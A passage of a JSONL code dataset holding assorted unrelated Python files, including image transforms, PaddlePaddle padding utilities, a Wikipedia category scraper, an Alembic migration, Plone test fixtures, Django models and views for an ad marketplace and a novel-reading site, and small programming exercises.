self.shift_y\n orig_y = 0\n\n if len(img.shape) <= 3:\n img_h, img_w = img.shape[:2]\n new_h = img_h - np.abs(self.shift_y)\n new_w = img_w - np.abs(self.shift_x)\n new_img[new_y:new_y + new_h, new_x:new_x + new_w] = img[\n orig_y:orig_y + new_h,\n orig_x:orig_x + new_w]\n return new_img\n else:\n img_h, img_w = img.shape[1:3]\n new_h = img_h - np.abs(self.shift_y)\n new_w = img_w - np.abs(self.shift_x)\n new_img[..., new_y:new_y + new_h, new_x:new_x + new_w, :] = img[\n ...,\n orig_y:orig_y + new_h,\n orig_x:orig_x + new_w,\n :]\n return new_img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply shift transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. 
Each row is (x, y).\n\n Returns:\n ndarray: cropped coordinates.\n \"\"\"\n coords[:, 0] += self.shift_x\n coords[:, 1] += self.shift_y\n return coords\n\n\nclass ResizeTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h, w, new_h, new_w, interp):\n \"\"\"\n Args:\n h, w (int): original image size\n new_h, new_w (int): new image size\n interp: PIL interpolation methods\n \"\"\"\n # TODO decide on PIL vs opencv\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n assert img.shape[:2] == (self.h, self.w)\n pil_image = Image.fromarray(img)\n interp_method = interp if interp is not None else self.interp\n pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)\n ret = np.asarray(pil_image)\n return ret\n\n def apply_coords(self, coords):\n coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n return coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n\ndef HFlip_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the horizontal flip transform on rotated boxes.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n # Transform x_center\n rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]\n # Transform angle\n rotated_boxes[:, 4] = -rotated_boxes[:, 4]\n return rotated_boxes\n\n\ndef Resize_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the resizing transform on rotated boxes. For details of how these (approximation)\n formulas are derived, please refer to :meth:`RotatedBoxes.scale`.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n scale_factor_x = transform.new_w * 1.0 / transform.w\n scale_factor_y = transform.new_h * 1.0 / transform.h\n rotated_boxes[:, 0] *= scale_factor_x\n rotated_boxes[:, 1] *= scale_factor_y\n theta = rotated_boxes[:, 4] * np.pi / 180.0\n c = np.cos(theta)\n s = np.sin(theta)\n rotated_boxes[:, 2] *= np.sqrt(\n np.square(scale_factor_x * c) + np.square(scale_factor_y * s))\n rotated_boxes[:, 3] *= np.sqrt(\n np.square(scale_factor_x * s) + np.square(scale_factor_y * c))\n rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s,\n scale_factor_y * c) * 180 / np.pi\n\n return rotated_boxes\n\n\nHFlipTransform.register_type(\"rotated_box\", HFlip_rotated_box)\nNoOpTransform.register_type(\"rotated_box\", lambda t, x: x)\nResizeTransform.register_type(\"rotated_box\", Resize_rotated_box)\n","sub_path":"playground/detection/coco/yolof/yolof_base/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":25318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"182670507","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"text2sql\"\"\"\n\nfrom text2sql.utils.nn_utils import PaddleFluidWrapper as fluider\n\nimport numpy as np\n\ndef pad_batch_data(insts,\n max_len=None,\n insts_data_type=\"int64\",\n shape=None,\n pad_idx=0,\n return_pos=False,\n return_input_mask=False,\n return_max_len=False,\n return_num_token=False,\n return_seq_lens=False,\n paddle_version_code=1.5):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n if max_len is None:\n max_len = max(len(inst) for inst in insts) if shape is None else shape[1]\n\n if shape is None:\n shape = [-1, max_len, 1]\n\n # id\n inst_data = np.array(\n [inst + list([pad_idx] * (max_len - len(inst))) for inst in insts])\n return_list += [inst_data.astype(insts_data_type).reshape(shape)]\n\n # position data\n if return_pos:\n inst_pos = np.array([\n list(range(0, len(inst))) + [pad_idx] * (max_len - len(inst))\n for inst in insts\n ])\n\n return_list += [inst_pos.astype(\"int64\").reshape([-1, max_len, 1])]\n\n if return_input_mask:\n # This is used to avoid attention on paddings.\n input_mask_data = np.array([[1] * len(inst) + [0] * (max_len - len(inst)) for inst in insts])\n input_mask_data = np.expand_dims(input_mask_data, axis=-1)\n return_list += [input_mask_data.astype(\"float32\")]\n\n if return_max_len:\n return_list += [max_len]\n\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n\n if return_seq_lens:\n if paddle_version_code <= 1.5:\n seq_lens_type = [-1, 1]\n else:\n seq_lens_type = [-1]\n seq_lens = np.array([len(inst) for inst in insts])\n return_list += [seq_lens.astype(\"int64\").reshape(seq_lens_type)]\n\n return return_list if len(return_list) > 1 else return_list[0]\n\n\ndef fix_random_seed(seed, trainer):\n \"\"\"固定主要随机数的种子,保证实验可复现\n\n Args:\n seed (TYPE): NULL\n trainer (TYPE): NULL\n\n Returns: TODO\n\n Raises: NULL\n \"\"\"\n if args.seed is None:\n return False\n\n import random\n\n random.seed(seed)\n np.random.seed(seed)\n os.environ['FLAGS_cudnn_deterministic'] = 'True'\n return True\n\n","sub_path":"NLP/DuSQL-Baseline/text2sql/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"379612605","text":"\"\"\"\nTask 2: В нашей школе мы не можем разглашать персональные данные\nпользователей, но чтобы преподаватель и ученик смогли объяснить нашей\nподдержке, кого они имеют в виду (у преподавателей, например, часто учится\nнесколько Саш), мы генерируем пользователям уникальные и легко произносимые\nимена. Имя у нас состоит из прилагательного, имени животного и двузначной\nцифры. В итоге получается, например, \"Перламутровый лосось 77\". Для\nгенерации таких имен мы и решали следующую задачу:\nПолучить с русской википедии список всех животных (Категория:Животные по\nалфавиту) и вывести количество животных на каждую букву алфавита. Результат\nдолжен получиться в следующем виде:\nА: 642\nБ: 412\nВ:....\n\n\"\"\"\n\nimport logging\n\nimport requests\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter('%(levelname)s, %(message)s'))\nlogger.addHandler(handler)\n\n\ndef create_list():\n \"\"\" creating the list of animals in Task_2.txt \"\"\"\n S = requests.Session()\n URL = 'https://ru.wikipedia.org/w/api.php'\n str_cont = ''\n list_of_names = []\n while True:\n\n PARAMS = {\n 'action': 'query',\n 'format': 'json',\n 'list': 'categorymembers',\n 'cmtitle': 'Категория:Животные_по_алфавиту',\n 'cmlimit': 500,\n 'cmcontinue': str_cont,\n }\n\n R = S.get(url=URL, params=PARAMS)\n DATA = R.json()\n if ('warnings' or 'errors') in DATA:\n logger.error(DATA['warnings'])\n\n for i in list(DATA['query']['categorymembers']):\n list_of_names.append(i['title'])\n\n if 'continue' in DATA:\n str_cont = DATA['continue']['cmcontinue']\n else:\n break\n file = open('Task_2.txt', 'w')\n file.write(str(list_of_names))\n file.close()\n\n\ndef main():\n # calling the list(.txt) creation function\n create_list()\n\n # reading the file with the list of animals\n file_r = open('Task_2.txt')\n list_names = file_r.read()\n file_r.close()\n\n logger.debug(list_names)\n logger.debug(len(list_names))\n\n # creating russian alphabet\n a = ord('а')\n before_e = [chr(i) for i in range(a, a + 6)]\n after_e = [chr(i) for i in range(a + 6, a + 32)]\n alphabet = ''.join(before_e + [chr(a + 33)] + after_e)\n\n # creating a dict with the number of animals for each letter\n letter_dict = {}\n for letter in alphabet.upper():\n counter = 0\n for i in list_names:\n if i[0] == letter:\n counter += 1\n letter_dict[letter] = counter\n\n logger.debug(letter_dict)\n\n # printing the result\n for key in letter_dict:\n print(f'{key}: {letter_dict[key]}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"70790305","text":"\"\"\"Add unique liked video index\n\nRevision ID: 6819601080a6\nRevises: 3a33f90aae7c\nCreate Date: 2020-02-13 15:14:11.782833\n\n\"\"\"\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"6819601080a6\"\ndown_revision = \"3a33f90aae7c\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(\n \"unique_liked_video\",\n \"liked_videos\",\n [\"user_id\", \"video_id\"],\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(\"unique_liked_video\", \"liked_videos\", type_=\"unique\")\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/6819601080a6_add_unique_liked_video_index.py","file_name":"6819601080a6_add_unique_liked_video_index.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"552625050","text":"\"\"\"List and manipulate vaults in the GraphQL server\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2021 Manetu Inc.\nAuthor: Alex Tsariounov \n\nThis is free software; please see the LICENSE file\nfor details and any restrictions.\n\"\"\"\n\nfrom mql.args import vault_parser\nfrom mql.commands.schema import get_schema\nimport json, sys\n\nverbosity = 0\nschema = {}\n\ndef dispatch(gql, args, remainder):\n \"\"\"gql: an intialized GQL object, args: the parsed arguments\"\"\"\n global verbosity\n verbosity = args.verbose\n\n if args.subcmd == None:\n print('Error: vault subcommand not specified')\n vault_parser.print_usage()\n sys.exit(1)\n\n if verbosity > 1:\n print(f'executing \"vault\" command, verbosity {verbosity}')\n\n args.terms.extend(remainder) # add potentially negated terms (for search)\n\n if verbosity > 1:\n print(f\"args: {args}\")\n\n cmds = {\n 'list': vlist,\n 'search': search,\n 'create': create,\n 'delete': delete\n }\n\n if args.subcmd not in cmds:\n raise ValueError(f'unknown command requested: \"{args.subcmd}\"')\n\n data = cmds[args.subcmd](gql, args)\n\n if args.pretty:\n print(json.dumps(json.loads(data), indent=2))\n else:\n print(data)\n\n\ndef vlist(gql, args):\n if verbosity > 0:\n print('executing \"list\" subcommand')\n\n scopes = ['ALL', 'CLAIMED', 'UNCLAIMED', 'REJECTED']\n scope = None\n for tt in args.terms:\n if tt in scopes:\n scope = tt\n break\n \n spec = 'scope:ALL'\n if scope != None:\n spec = f'scope:{scope}'\n elif len(args.terms) > 0:\n spec = f'labels:{args.terms}'\n\n fields = get_vault_fields(gql, args.full, args.attributes, args.iri)\n\n query = f'{{ get_provider_vaults({spec}) {{ {\" \".join(fields)} }} }}'\n\n if verbosity > 1:\n print(f'using query text: {query}')\n\n data = gql.query(query, None)\n\n return data\n\ndef search(gql, args):\n pass\n\ndef create(gql, args):\n pass\n\ndef delete(gql, args):\n pass\n\n\ndef lookup_object(gql, name):\n global schema\n if schema == {}:\n schema = json.loads(get_schema(gql, 'all', True))['data']['__schema']\n\n obj = None\n for v in schema['types']:\n if v['name'] == name:\n obj = v\n break\n return obj\n\ndef get_vault_fields(gql, full=False, attr=False, iri=False):\n # minimal field set\n if not full:\n return ['label']\n\n # full field set\n vault = lookup_object(gql, 'vault')\n if vault == None:\n raise ValueError(\"can't find 'vault' object in schema\")\n\n flist = []\n for field in vault['fields']:\n # skip attributes for now\n if field['name'] == 'attributes':\n continue\n\n if field['type']['kind'] == 'ENUM' or field['type']['kind'] == 'SCALAR':\n flist.append(field['name'])\n continue\n\n if field['type']['kind'] == 'NON_NULL' and field['type']['ofType']['kind'] == 'SCALAR':\n flist.append(field['name'])\n\n return flist\n","sub_path":"mql/commands/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"56457012","text":"# -*- coding: utf-8 -*-\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing.layers import FunctionalTesting\nfrom plone.app.testing.layers import IntegrationTesting\nfrom plone.testing import z2\n\n\nadmin = {\n 'id': 'admin',\n 'password': 'secret',\n 'roles': ['Manager'],\n}\neditor = {\n 'id': 'editor',\n 'password': 'secret',\n 'roles': ['Editor'],\n}\ncontributor = {\n 'id': 'contributor',\n 'password': 'secret',\n 'roles': ['Contributor'],\n}\nusers_to_be_added = (\n admin,\n editor,\n contributor,\n)\nusers_with_member_folder = (\n editor,\n contributor,\n)\n\n\nclass PloneAppIterateLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes)\n z2.installProduct(app, 'Products.ATContentTypes')\n\n z2.installProduct(app, 'Products.Archetypes')\n z2.installProduct(app, 'Products.ATContentTypes')\n z2.installProduct(app, 'plone.app.blob')\n z2.installProduct(app, 'plone.app.collection')\n\n import plone.app.iterate\n self.loadZCML(package=plone.app.iterate)\n z2.installProduct(app, 'plone.app.iterate')\n\n def setUpPloneSite(self, portal):\n # restore default workflow\n applyProfile(portal, 'Products.CMFPlone:testfixture')\n\n # add default content\n applyProfile(portal, 'Products.ATContentTypes:content')\n\n applyProfile(portal, 'plone.app.iterate:plone.app.iterate')\n applyProfile(portal, 'plone.app.iterate:test')\n\n for user in users_to_be_added:\n portal.portal_membership.addMember(\n user['id'],\n user['password'],\n user['roles'],\n [],\n )\n\n for user in users_with_member_folder:\n mtool = portal.portal_membership\n if not mtool.getMemberareaCreationFlag():\n mtool.setMemberareaCreationFlag()\n mtool.createMemberArea(user['id'])\n\n if mtool.getMemberareaCreationFlag():\n mtool.setMemberareaCreationFlag()\n\n portal.portal_workflow.setChainForPortalTypes(\n ('Document',),\n 'plone_workflow',\n )\n\n # Turn on versioning for folders\n portal_repository = portal.portal_repository\n portal_repository.addPolicyForContentType(\n 'Folder',\n u'at_edit_autoversion',\n )\n portal_repository.addPolicyForContentType(\n 'Folder',\n u'version_on_revert',\n )\n versionable_types = portal_repository.getVersionableContentTypes()\n versionable_types.append('Folder')\n portal_repository.setVersionableContentTypes(versionable_types)\n\n\nPLONEAPPITERATE_FIXTURE = PloneAppIterateLayer()\n\nPLONEAPPITERATE_INTEGRATION_TESTING = IntegrationTesting(\n bases=(PLONEAPPITERATE_FIXTURE,),\n name=\"PloneAppIterateLayer:Integration\")\n\nPLONEAPPITERATE_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(PLONEAPPITERATE_FIXTURE,),\n name=\"PloneAppIterateLayer:Functional\")\n","sub_path":"buildout-cache--/eggs/plone.app.iterate-3.0.1-py2.7.egg/plone/app/iterate/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"220705998","text":"from sys import stdin\n\n\nmaxi = None\nmini = None\nfor line in stdin:\n n = int(line.strip())\n if maxi is None and mini is None:\n maxi = n\n mini = n\n else:\n maxi , mini = max(maxi, n), min(mini, n)\nprint(mini, maxi)\n\n\n","sub_path":"maxmin.py","file_name":"maxmin.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"395217139","text":"# https://www.codewars.com/kata/55de8eabd9bef5205e0000ba/solutions/python/me/best_practice\n\ndef find_emirp(n):\n primes = map(str, sieve(n))\n emirps = [int(i) for i in primes if is_prime(int(i[::-1])) and is_prime(int(i)) and i != i[::-1]]\n if not len(emirps):\n return [0, 0, 0]\n return [len(emirps), max(emirps), sum(emirps)]\n \ndef sieve(limit):\n not_primes = set()\n primes = []\n for i in range(13, limit + 1, 2):\n if not i in not_primes:\n primes.append(i)\n else:\n not_primes.update(range(i, limit, i * i))\n return primes\n \ndef is_prime(n):\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n else:\n return True\n\nprint(find_emirp(10))\nprint(find_emirp(50))\nprint(find_emirp(100))\nprint(find_emirp(200))\n\n","sub_path":"findEmirps.py","file_name":"findEmirps.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541925114","text":"import json\nimport sys\nsys.path.insert(0,'../')\nimport jwzthreading_r as th\nimport unittest\nimport os\n\nsys.path.insert(0,'../')\nfrom mboxparser import MboxParser\n\nclass Test_Mbox_Mails(unittest.TestCase):\n\n\tdef setUp(self):\n\t\ttry:\n\t\t\tos.remove('testoutput.json')\n\t\texcept OSError:\n\t\t\tpass\n\n\t\tself.mparser = MboxParser()\n\n\tdef test(self):\n\t\t\"\"\"\n\t\tThis function checks whether the count of values \n\t\tin dictionary output of jwzthreading_r.py for each\n\t\tMessage-ID is equal to the count of property ID in \n\t\ttestoutput.json file.\n\t\t\n\t\t\"\"\"\n\t\tvalue_count=0\n\t\toriginal_count=0\n\t\tmbox = self.mparser.create_json('xen-devel-2016-05', 'testoutput.json', file=True)\n\t\tmessages = th.message_details('xen-devel-2016-05', file=True)\n\t\t#print(messages.items())\n\t\tfor key,value in messages.items():\n\t\t\tvalue_count=0\n\t\t\toriginal_count = len(value)\n\t\t\twith open('testoutput.json') as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\twhile True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tjfile=json.loads(line)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tline += next(f)\n\n\n\t\t\t\t\tif jfile['property'] == key:\n\t\t\t\t\t\tvalue_count = value_count + 1\n\n\t\t\tself.assertEquals(original_count+1,value_count,\"Equal\")\n\n\tdef tearDown(self):\n\t\tdel self.mparser\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"173112303","text":"from django.db import models\nfrom user_control.models import AdvertiserModel, CustomerModel\n\n\nclass AdvertiseModel(models.Model):\n # ADVERTISEMENT_TYPE_CHOICES = [\n # ('Bill Board', 'Bill Board'),\n # ('Vehicle', 'Vehicle'),\n # ]\n #\n # PRICE_RATE_TYPE_CHOICES = [\n # ('Day', 'Day'),\n # ('Month', 'Month'),\n # ]\n #\n # SIZE_SCALE_TYPE_CHOICES = [\n # ('Inches', 'Inches'),\n # ('Feet', 'Feet'),\n # ('Meter', 'Meter'),\n # ]\n\n advertiser = models.ForeignKey(AdvertiserModel, null=True, blank=True, on_delete=models.CASCADE)\n image = models.ImageField(null=True, blank=True)\n location = models.CharField(max_length=255)\n facing = models.CharField(max_length=255, null=True, blank=True)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n # price_rate = models.CharField(max_length=30, choices=PRICE_RATE_TYPE_CHOICES)\n price_rate = models.CharField(max_length=30)\n height = models.DecimalField(max_digits=5, decimal_places=2)\n width = models.DecimalField(max_digits=5, decimal_places=2)\n # size_scale = models.CharField(max_length=30, choices=SIZE_SCALE_TYPE_CHOICES)\n size_scale = models.CharField(max_length=30)\n # advertisement_type = models.CharField(max_length=30, choices=ADVERTISEMENT_TYPE_CHOICES)\n advertisement_type = models.CharField(max_length=30)\n additional_note = models.TextField(null=True, blank=True)\n date_posted = models.DateTimeField(auto_now_add=True)\n is_active = models.BooleanField(default=True)\n\n def __str__(self):\n return self.location\n\n\nclass OrderModel(models.Model):\n PRICE_RATE_TYPE_CHOICES = [\n ('Day', 'Day'),\n ('Month', 'Month'),\n ]\n\n customer = models.ForeignKey(CustomerModel, null=True, blank=True, on_delete=models.CASCADE)\n advertise = models.ForeignKey(AdvertiseModel, null=True, blank=True, on_delete=models.CASCADE)\n image = models.ImageField(null=True, blank=True)\n duration = models.CharField(max_length=30)\n price_rate = models.CharField(max_length=30, choices=PRICE_RATE_TYPE_CHOICES)\n total_cost = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)\n additional_note = models.TextField(null=True, blank=True)\n is_approved = models.BooleanField(default=False)\n is_canceled = models.BooleanField(default=False)\n advertiser_paid_approval = models.BooleanField(default=False)\n customer_paid_approval = models.BooleanField(default=False)\n is_running = models.BooleanField(default=False)\n is_complete = models.BooleanField(default=False)\n date_created = models.DateTimeField(auto_now_add=True)\n\n\nclass OrderPaymentModel(models.Model):\n order = models.ForeignKey(OrderModel, null=True, blank=True, on_delete=models.CASCADE)\n transaction_id = models.CharField(max_length=50, null=True, blank=True)\n phone_number = models.CharField(max_length=15, null=True, blank=True)\n date_time = models.DateTimeField(auto_now_add=True)\n","sub_path":"ad_control/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"349122942","text":"#!/usr/bin/env python3\nfrom lilaclib import *\n\nupdate_on = [{'aur':None}, {'vcs':'git+https://git.ffmpeg.org/ffmpeg.git'}]\nbuild_prefix = 'extra-x86_64'\npre_build = aur_pre_build\npost_build = aur_post_build\n\nif __name__ == '__main__':\n single_main(build_prefix)\n","sub_path":"archlinuxcn/ffmpeg-git/lilac.py","file_name":"lilac.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"347506663","text":"from django.db.models import Count\r\nfrom django.shortcuts import render\r\nfrom apps.books.models import Heat, Novel, Flash,Generalize\r\nfrom django.db.models import Q\r\nimport re\r\nfrom django.http import FileResponse\r\nimport json\r\nfrom apps.books.china_num import to_chinese4\r\nimport random\r\nimport os\r\n\r\n# Create your views here.\r\nkinds ={'xh':'玄幻奇幻',\"ds\":'都市言情','kh':'科幻灵异',\"dm\":'耽美同人','np':'女频言情','ls':'历史军事','wx':'武侠仙侠','wy':'网游竞技'}\r\n\r\ndef index(request):\r\n tops = {}\r\n left = {}\r\n unfind = \"\"\r\n all = Novel.objects.all()\r\n new_novel = {\"one\":all[0],\"two\":all[1]}\r\n if request.method == \"POST\":\r\n novel =all.filter(novel_name=request.POST.get('w'))\r\n if len(novel) == 0:\r\n unfind = \"没有你要找的小说\"\r\n else:\r\n return mulu(request, novel[0].id)\r\n for key ,kind_name in kinds.items():\r\n novels = all.filter(kind = kind_name).order_by(\"-heat__read_num\")\r\n if len(novels) > 2:\r\n left[key] = novels[0:2]\r\n else:\r\n left[key] = novels\r\n flash1 = Flash.objects.get(pk=2)\r\n flash2 = Flash.objects.get(pk=3)\r\n flash3 = Flash.objects.get(pk=4)\r\n man_novel = all.exclude(Q(kind=\"女频言情\") and Q(kind = \"耽美同人\"))\r\n if len(man_novel)>6:\r\n man_novel = man_novel[0:6]\r\n woman_novel = all.filter(Q(kind=\"女频言情\") | Q(kind = \"耽美同人\"))\r\n if len(woman_novel)>6:\r\n woman_novel = woman_novel[0:6]\r\n old = all\r\n click_order = old.order_by(\"-heat__read_num\")\r\n if len(click_order) > 6:\r\n click_order = list(click_order[0:6])\r\n down_order = old.order_by(\"-heat__down_load\")\r\n if len(down_order) > 6:\r\n down_order = list(down_order[0:6])\r\n nv = all.values(\"novel_name\")\r\n collect = nv.annotate(Count(\"bookshelf\")).order_by(\"-bookshelf__count\")[:6]\r\n all_generalize = Generalize.objects.all()\r\n for key ,value in kinds.items():\r\n top = all.filter(kind=value).order_by(\"-heat__read_num\")[0]\r\n tops[value] = top\r\n return render(request, \"index.html\",{\"unfind\":unfind,\r\n \"left\":left,\r\n \"flash1\":flash1,\"flash2\":flash2,\"flash3\":flash3,\r\n \"new_novel\":new_novel,\r\n \"man_novel\":man_novel,\r\n \"woman_novel\":woman_novel,\r\n \"click_order\":click_order,\r\n \"down_order\":down_order,\r\n \"collect\":collect,\r\n \"all_generalize\":all_generalize,\r\n \"tops\":tops,\r\n }\r\n )\r\n\r\n\r\ndef article(request,id):\r\n flash = Flash.objects.get(pk=id)\r\n flash_text = None\r\n with open(flash.text, 'r', encoding=\"utf-8\") as fp:\r\n flash_text = fp.readlines()\r\n return render(request,\"flash.html\",{\"flash\":flash,\"flash_text\":flash_text})\r\n\r\n\r\n\r\ndef kind(request,kind_name,num=0):\r\n chapter_list = []\r\n user = request.user\r\n kind_inf = None\r\n with open(\"static/setting.txt\",'r',encoding=\"utf-8\")as fp:\r\n kind_inf = json.loads(fp.read())\r\n if num < 0:\r\n num = 0\r\n novel_set = Novel.objects.filter(kind=kind_name)\r\n lenght = len(novel_set)\r\n n =lenght\r\n if num >= lenght:\r\n num = num-10\r\n pg_len = 1\r\n while True:\r\n n = n - 10\r\n if n > 0 :\r\n pg_len += 1\r\n else:\r\n break\r\n # print(lenght)\r\n if num+10 > lenght:\r\n novel_set = novel_set[num:(num+(lenght-num))]\r\n else:\r\n novel_set = novel_set[num:(num+10)]\r\n if num -10 < 0:\r\n last_num = num\r\n else:\r\n last_num = num - 10\r\n next_num = num + 10\r\n old = Novel.objects.filter(kind=kind_name)\r\n click_order = old.order_by(\"-heat__read_num\")\r\n if len(click_order) > 10:\r\n click_order = list(click_order[0:10])\r\n down_order = old.order_by(\"-heat__down_load\")\r\n if 
len(down_order) > 10:\r\n down_order = list(down_order[0:10])\r\n novel_all = Novel.objects.all()\r\n i = random.randint(0,len(novel_all)-10)\r\n other = novel_all[i:(i+10)]\r\n collect_id = request.GET.get('collect_id', '')\r\n print(collect_id)\r\n novels_numb = Novel.objects.all().count()\r\n # 判断用户是否已经登录\r\n info = {\r\n 'code': 200,\r\n 'msg': '收藏成功!',\r\n }\r\n if collect_id:\r\n # 判断用户是否已经登录\r\n if not user.is_authenticated:\r\n info = {\r\n 'code':300,\r\n 'msg':'没有登录就无法收藏小说哦',\r\n }\r\n else:\r\n # 判断用户是否已经收藏过小说\r\n novel = user.shelf.books.filter(id=collect_id)\r\n print(novel)\r\n if novel:\r\n info = {\r\n 'code':301,\r\n 'msg':'您已经收藏过本小说啦',\r\n }\r\n else:\r\n # 将书本实例保存到用户书架里\r\n new_novel = Novel.objects.get(id=collect_id)\r\n # many2many字段信息保存\r\n user.shelf.books.add(new_novel)\r\n user.shelf.save()\r\n # 用户没有阅读,直接收藏,默认从第一章开始读书\r\n if not user.shelf.chapters:\r\n collect_info = {}\r\n collect_info[new_novel.id] = 1\r\n user.shelf.chapters = json.dumps(collect_info)\r\n user.shelf.save()\r\n print(user.shelf.chapters)\r\n else:info={}\r\n\r\n return render(request,\"list.html\",{\"novel_set\":novel_set,\r\n \"pg_num\":int(num/10)+1,\r\n \"pg_len\":pg_len,'kind_name':kind_name,\r\n \"next\":next_num,\"last\":last_num,\r\n \"kind_text\":kind_inf[kind_name][0],\r\n \"kind_img\":kind_inf[kind_name][1],\r\n \"click_order\":click_order,\r\n \"down_order\":down_order,\r\n \"other\":other,\r\n \"info\":info,\r\n \"novels_numb\":novels_numb,\r\n }\r\n )\r\n\r\n\r\n\r\n\r\ndef mulu(request,id=1):\r\n li= []\r\n novel = Novel.objects.get(pk=id)\r\n name = novel.novel_name\r\n section = json.loads(novel.section_num)\r\n print(section)\r\n se_num = {}\r\n # download/万古天帝.txt\r\n # django工作目录为项目目录下第一层,与apps平级\r\n with open(novel.file, 'r', encoding=\"utf-8\") as fp:\r\n for key, value in section.items():\r\n se = to_chinese4(int(key))\r\n for line in fp:\r\n if re.search(f\"{value}.*[\\n]\", line) or re.search(f\"第{key}章.*[\\n]\", line) or re.search(f\"第{se}章.*[\\n]\", line) :\r\n se_num[key] = line\r\n break\r\n else:\r\n break\r\n li = []\r\n for key ,value in se_num.items():\r\n li.append((key,value))\r\n # print(li)\r\n return render(request,\"mulu.html\",{\"li\":li,\"novel_id\":id,\"se_num\":len(se_num),\"name\":name})\r\n\r\n\r\ndef look_novel(request,id=1,sec_num = 1):\r\n novel = Novel.objects.get(pk=id)\r\n print(novel.heat)\r\n if sec_num == 1:\r\n novel.heat.read_num = novel.heat.read_num + 1\r\n novel.save()\r\n data = []\r\n section = json.loads(novel.section_num)\r\n se_re = section[str(sec_num)]\r\n print(se_re)\r\n with open(novel.file,'r',encoding='utf-8') as fp:\r\n pos = fp.seek(0, 2)\r\n fp.seek(0)\r\n flag = 2\r\n while flag:\r\n text = fp.readline()\r\n if flag == 1 and re.search(r'第.*章', text) is None and fp.tell() != pos:\r\n data.append(text)\r\n elif flag == 2:\r\n pass\r\n else:\r\n flag -= 1\r\n if re.search(se_re, 